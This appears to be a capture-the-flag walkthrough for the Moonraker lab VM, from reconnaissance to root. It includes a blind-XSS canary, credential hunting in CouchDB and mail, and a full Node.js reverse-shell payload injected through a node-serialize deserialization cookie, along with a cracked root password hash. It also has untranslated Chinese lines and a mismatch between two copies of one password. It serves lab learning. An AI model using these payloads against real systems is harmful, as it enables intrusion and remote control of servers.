0x01 Introduction
Attack the Moonraker system, find the vulnerability that poses the greatest threat, use it to compromise the target machine, escalate privileges and read the flag under root's home directory.
Moonraker: 1 image download:
http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA
0x02 Information Gathering
1. Host discovery
root@kali2018:/# arp-scan -l

192.168.1.10 is identified as the target machine.
2. Port scan
Scan the target's ports with nmap:
root@kali2018:~# nmap -p - -A 192.168.1.10 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST
Nmap scan report for 192.168.1.10
Host is up (0.00077s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
|   256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
|_  256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp open  http    Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    couchdb: 33681
5984/tcp open  couchdb?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Object Not Found
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 58
|     Content-Type: application/json
|     Date: Mon, 11 Feb 2019 21:22:55 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: bf092a958f
|     X-CouchDB-Body-Time: 0
|     {"error":"not_found","reason":"Database does not exist."}
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 164
|     Content-Type: application/json
|     Date: Mon, 11 Feb 2019 21:22:02 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: f038a56575
|     X-CouchDB-Body-Time: 0
|     {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
|   HTTPOptions:
|     HTTP/1.0 500 Internal Server Error
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 61
|     Content-Type: application/json
|     Date: Mon, 11 Feb 2019 21:22:02 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: fdeb1a3860
|     X-Couch-Stack-Hash: 1828508689
|     X-CouchDB-Body-Time: 0
|_    {"error":"unknown_error","reason":"badarg","ref":1828508689}

The nmap output shows the following open ports and services: 22 (ssh), 80 (http), 110 (pop3), 3000 (node.js), 4369 (epmd), 5984 (couchdb). (Port 110 is not in the excerpt above, but "Not shown: 65529 closed ports" means nmap counted six open ports.)
3. Directory scan
I prefer gobuster and DirBuster for directory brute-forcing; here I ran gobuster against the target.
After the scan finished, one suspicious directory stood out: /services

Open http://192.168.1.10/services/. At the bottom of the page there is a SEND AN INQUIRY link; click it.

The link opens an after-sales contact page. Note the text saying that someone will review our submission and get in touch within 5 minutes: in other words, somebody on the other side is going to open whatever we send.

So we embed an <img> tag whose src points at a file on our own remote web server (a blind-XSS canary: as soon as whoever reviews the inquiry renders the injected HTML, the request shows up in our server's access log, together with the Referer of the page it was rendered on).

Start Apache
Before submitting the form, start the Apache service on the attacking machine and create a test file test.txt under /var/www/html with any content:
root@kali2018:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali2018:~# cd /var/www
root@kali2018:/var/www# ls
html
root@kali2018:/var/www# cd html/
root@kali2018:/var/www/html# ls
index.html  index.nginx-debian.html
root@kali2018:/var/www/html# vi test.txt
root@kali2018:/var/www/html#
Check that the Apache server is reachable.

隨后可以通過apache2 access.log可以查看到訪問目標靶機網站日志記錄。點擊提交后,它已顯示感謝您的提交消息,如下圖所示。

Watch the Apache access log:
tail -f /var/log/apache2/access.log
The log contains an interesting HTTP Referer: http://192.168.1.10/svc-inq/salesmoon-gui.php
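The canary check above can be automated instead of eyeballed with tail -f. The following is an added example and not part of the original walkthrough: a Node.js script that parses Apache combined-format access-log lines, keeps only requests for the planted canary file, and reports the Referer, which is the page that rendered our <img>. The log lines embedded in it are constructed for the demo; the canary path /test.txt and the attacker address 192.168.1.21 follow the walkthrough, and the script name canary.js is an assumption.

```javascript
// Added example (not from the original walkthrough): watch an Apache "combined"
// access log for hits on the planted canary file and report which page rendered
// our <img> tag. The SAMPLE_LOG lines at the bottom are constructed.
//
// Payload submitted in the inquiry form (our Kali box is 192.168.1.21):
//   <img src="http://192.168.1.21/test.txt">

const CANARY_PATH = "/test.txt"; // file planted under /var/www/html on Kali

// Apache combined log format:
//   host ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
const LINE_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null;
  return {
    host: m[1], time: m[2], method: m[3], path: m[4],
    status: Number(m[5]), referer: m[7] === "-" ? null : m[7], ua: m[8],
  };
}

// Return every request for the canary path. With requireReferer=true only
// requests carrying a Referer count: those come from a browser rendering a page
// that contains our <img>, as opposed to our own reachability check with curl.
function findCanaryHits(lines, { canaryPath = CANARY_PATH, requireReferer = true } = {}) {
  const hits = [];
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || e.path.split("?")[0] !== canaryPath) continue;
    if (requireReferer && !e.referer) continue;
    hits.push({ victim: e.host, page: e.referer, ua: e.ua, time: e.time });
  }
  return hits;
}

// Constructed sample log, not a real capture from the VM.
const SAMPLE_LOG = [
  // our own check from Kali: no Referer, so it is not a canary hit
  '192.168.1.21 - - [11/Feb/2019:16:40:01 -0500] "GET /test.txt HTTP/1.1" 200 12 "-" "curl/7.64.0"',
  // unrelated request
  '192.168.1.10 - - [11/Feb/2019:16:41:10 -0500] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"',
  // the canary fired: the target's browser rendered our <img> inside its back-office page
  '192.168.1.10 - - [11/Feb/2019:16:41:12 -0500] "GET /test.txt HTTP/1.1" 200 12 "http://192.168.1.10/svc-inq/salesmoon-gui.php" "Mozilla/5.0 (X11; Linux x86_64)"',
];

function format(hit) {
  return `${hit.time} ${hit.victim} rendered our payload on ${hit.page} [${hit.ua}]`;
}

if (typeof require !== "undefined" && require.main === module) {
  // Usage: tail -f /var/log/apache2/access.log | node canary.js --stdin
  // Without --stdin the constructed sample is used instead.
  if (process.argv.includes("--stdin")) {
    require("readline").createInterface({ input: process.stdin })
      .on("line", (l) => findCanaryHits([l]).forEach((h) => console.log(format(h))));
  } else {
    findCanaryHits(SAMPLE_LOG).forEach((h) => console.log(format(h)));
  }
}
```

The Referer is the whole point: a hit without one is just us (or a crawler) fetching the file, while a hit with one tells us the URL of the internal page that rendered the submission, which is exactly how /svc-inq/salesmoon-gui.php was found.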

0x03 Exploitation
1. CouchDB reconnaissance
Open the Referer URL in a browser.

然后顯示出"返回銷售管理后台"的超鏈接,點擊可進入到銷售后台管理登錄頁面。

Next, click CouchDB Notes; it gives a hint about the username and password:
Username: jaws; password: the name of Jaws' girlfriend followed by x99

So we search Google for "Jaws' girlfriend".

We now have the username and password for Apache CouchDB's Fauxton interface. For background on Fauxton and CouchDB, see the documentation (http://docs.couchdb.org/en/stable/fauxton/install.html).

2. CouchDB login and information disclosure
Port 5984 is open, so the CouchDB (Fauxton) login page is at http://192.168.1.10:5984/_utils/.
Log in with the following credentials:
Username: jaws
Password: dollyx99


Login succeeds; now let's look at the three databases.
The links database exposes the most.

Inspect the documents in the links database: each document contains a link to a directory, and the third one looks useful for the next step.


So we open the link from the third document, which points to a useful directory.
It displays an HR office memo page that records several people's e-mails.

The e-mails leak usernames and passwords.

3. Node.js deserialization
Open the back-office page http://192.168.1.10/raker-sales/. The entry "hugo's page moved to port 3k" is interesting, given hugo's e-mail in the HR memo above.

Opening that link shows information about the Node.js server and how to access it.

The username and password are in Hugo's HR e-mail at http://192.168.1.10/HR-Confidential/offer-letters.html

It shows the credentials for the Node.js login (on port 3000).

After login, the Node.js server hands out a cookie via Set-Cookie.
Background on the Node.js deserialization vulnerability (node-serialize's unserialize() passing tagged function strings to eval, CVE-2017-5941) can be found in the referenced write-up.
4. Exploiting the deserialization flaw
From the nmap output we know port 3000 runs a Node.js Express application. Opening http://192.168.1.10:3000 in a browser brings up an HTTP Basic login prompt.
Username: hugo
Password: TempleLasersL2K

After logging in, the page shows a single message. It looks useless at first, but after spending some time working out the next step it turns out to be very interesting.

Open the browser developer tools (F12) and look at the request: the profile cookie holds a base64-encoded serialized object. This is where we inject the node-serialize payload, base64-encoded.

Generate a Node.js reverse shell with msfvenom:
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21 LPORT=1234
Wrap the msfvenom output in a small script, rce.js, that serializes it with node-serialize.
rce.js:
var rev = {
  rce: function () {
    var require = global.require || global.process.mainModule.constructor._load;
    if (!require) return;
    var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
    var net = require("net"),
        cp = require("child_process"),
        util = require("util"),
        sh = cp.spawn(cmd, []);
    var client = this;
    var counter = 0;
    function StagerRepeat() {
      client.socket = net.connect(1234, "192.168.1.21", function () {
        client.socket.pipe(sh.stdin);
        if (typeof util.pump === "undefined") {
          sh.stdout.pipe(client.socket);
          sh.stderr.pipe(client.socket);
        } else {
          util.pump(sh.stdout, client.socket);
          util.pump(sh.stderr, client.socket);
        }
      });
      // msfvenom's stager refers to an undeclared "socket" here; net.connect has
      // already been issued, so the callback still fires and the shell comes back
      // (only the reconnect-on-error handler is lost).
      socket.on("error", function (error) {
        counter++;
        if (counter <= 10) {
          setTimeout(function () { StagerRepeat(); }, 5 * 1000);
        } else process.exit();
      });
    }
    StagerRepeat();
  }
};
var serialize = require('node-serialize');
console.log(serialize.serialize(rev));
Run node rce.js to get the serialized string:
root@kali2018:/opt# node rce.js
{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}
Next, append the IIFE parentheses () right after the function's closing brace in the serialized string, so that unserialize() does not merely rebuild the function but invokes it:
{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}
然后將其轉換成base64編碼

Log in to the Node.js application first, then reload the page and intercept the request with Burp Suite. Replace the value of the profile cookie with the whole base64 string and forward the request. Before forwarding, start your nc listener.

With netcat listening on the attacking machine we receive the shell, then upgrade it to an interactive TTY with python -c 'import pty; pty.spawn("/bin/bash")':
root@kali2018:/opt# nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.10: inverse host lookup failed: Unknown host
connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010
id
uid=1001(jaws) gid=1001(jaws) groups=1001(jaws)
python -c "import pty;pty.spawn('/bin/bash')"
jaws@moonraker:/$
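Why the trailing () turns a harmless serialized object into code execution is easier to see in code than in a screenshot. The following added example (not the walkthrough's rce.js and not node-serialize's own source) re-implements, as an assumption about how the package behaves, the eval-based reviver that node-serialize applies to strings tagged _$$ND_FUNC$$_; it builds the profile cookie with and without the IIFE, and sets a hardened JSON-only parser beside the vulnerable one. In place of the msfvenom reverse shell the function body only increments a counter, so nothing leaves the machine.

```javascript
// Added example, not the walkthrough's rce.js: rebuilds the node-serialize
// profile cookie, shows why the trailing "()" matters, and contrasts the
// vulnerable reviver with a safe parser. vulnerableUnserialize() is a minimal
// re-implementation of node-serialize's behaviour (assumption, not its source).

const FUNCFLAG = "_$$ND_FUNC$$_";

// Vulnerable: any string value tagged with FUNCFLAG is handed to eval().
function vulnerableUnserialize(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === "string" && v.startsWith(FUNCFLAG)) {
      // "(function(){...})" only rebuilds a function object;
      // "(function(){...}())" runs it right here, during deserialization.
      obj[key] = eval("(" + v.slice(FUNCFLAG.length) + ")");
    }
  }
  return obj;
}

// Hardened: plain JSON, allow-listed scalar fields, no code reconstruction.
function safeUnserialize(json, allowed = ["username", "country", "city", "num"]) {
  const obj = JSON.parse(json);
  const out = {};
  for (const k of allowed) {
    if (typeof obj[k] === "string" || typeof obj[k] === "number") out[k] = obj[k];
  }
  return out;
}

// Build the profile cookie the way the walkthrough does by hand: serialize an
// object whose "rce" member is a tagged function, optionally append "()", base64.
function buildCookie(body, iife) {
  const fn = "function(){" + body + "}" + (iife ? "()" : "");
  const json = JSON.stringify({ rce: FUNCFLAG + fn }); // escapes inner quotes like node rce.js does
  return { json, cookie: Buffer.from(json, "utf8").toString("base64") };
}

function decodeCookie(cookie) {
  return Buffer.from(cookie, "base64").toString("utf8");
}

// Stand-in for the reverse shell: an observable side effect without a network.
global.__payloadRuns = 0;
const BODY = "global.__payloadRuns++;";

function demo() {
  const result = {};

  global.__payloadRuns = 0;
  vulnerableUnserialize(decodeCookie(buildCookie(BODY, false).cookie));
  result.runsWithoutIife = global.__payloadRuns; // function rebuilt, never called

  global.__payloadRuns = 0;
  const armed = buildCookie(BODY, true);
  vulnerableUnserialize(decodeCookie(armed.cookie));
  result.runsWithIife = global.__payloadRuns;    // executed inside unserialize

  global.__payloadRuns = 0;
  const safe = safeUnserialize(decodeCookie(armed.cookie));
  result.runsSafe = global.__payloadRuns;        // never evaluated
  result.safeKeys = Object.keys(safe);           // "rce" is not an allowed field

  result.cookie = armed.cookie;                  // value for: Cookie: profile=<this>
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log(`without (): ${r.runsWithoutIife} run(s); with (): ${r.runsWithIife} run(s); safe parser: ${r.runsSafe} run(s)`);
  console.log("Cookie: profile=" + r.cookie);
}
```

The server-side fix is the second parser: the application only ever needs a few scalar profile fields, so it should parse JSON and copy those fields, never reconstruct functions from user-controlled data.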
0x04 Privilege Escalation
While enumerating as jaws, I noticed Postfix listening locally on port 25.
netstat -ano

In /var/mail we found four mailboxes, but the jaws account has no permission to read them.
jaws@moonraker:~$ cd /var/mail
jaws@moonraker:/var/mail$ ls -al
total 96
drwxrwsr-x  2 root          mail   4096 Oct 14 10:25 .
drwxr-xr-x 12 root          root   4096 Sep 20 17:38 ..
-rw-------  1 hugo          mail   2994 Oct  6 11:47 hugo
-rw-------  1 moonrakertech mail   1478 Oct  5 19:24 moonrakertech
-rw-------  1 root          mail  68975 Oct  6 11:40 root
-rw-------  1 sales         mail   6342 Oct 14 10:25 sales
Looking at how CouchDB is configured: it is installed under /opt/couchdb and reads its local settings from /opt/couchdb/etc/local.ini.
Let's look at the tail of local.ini:
jaws@moonraker:/var/mail$ tail /opt/couchdb/etc/local.ini
Username: hugo
Password: 321Blast0ff!!

With hugo's password, I switched to his account and read his mail.
jaws@moonraker:/var/mail$ su hugo
Password: 321Blast0ff!
Reading hugo's mailbox, message 2 is the interesting one: it contains root's password hash and says the new password is the old one with "VR00M" appended.
hugo@moonraker:/var/mail$ mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/hugo": 3 messages 3 new
>N  1 moonrakertech@moo  Fri Oct  5 19:11  17/842   RE:Root Access
 N  2 moonrakertech@moo  Fri Oct  5 19:39  23/1351  RE:RE:RE:Root Access
 N  3 hr@moonraker.loca  Fri Oct  5 20:24  17/801   Decompression Accident
&

Read message 2:
& 2
Message 2:
From moonrakertech@moonraker.localdomain  Fri Oct  5 19:39:51 2018
X-Original-To: hugo@moonraker.localdomain
To: hugo@moonraker.localdomain
Subject: RE:RE:RE:Root Access
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT)
From: moonrakertech@moonraker.localdomain

Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.

Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes. Have fun with the decryption process "Boss"! Haha!

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::
This gives us root's old password hash (a sha512crypt, $6$, shadow entry).
Copy the old hash into a file, root.hash, and crack it offline with John the Ripper:
john root.hash

Username: root
Password: cyber
The current password is therefore the old one with VR00M appended: cyber + VR00M = cyberVR00M.
Switch to root with it.
hugo@moonraker:/var/mail$ su root
Password: cyberVR00M

0x05 Reading the flag
Now running as root; looking around root's home directory, we find flag.txt.
root@moonraker:~# cd /root
root@moonraker:~# ls
core  Desktop  Downloads  flag.txt
root@moonraker:~# cat flag.txt
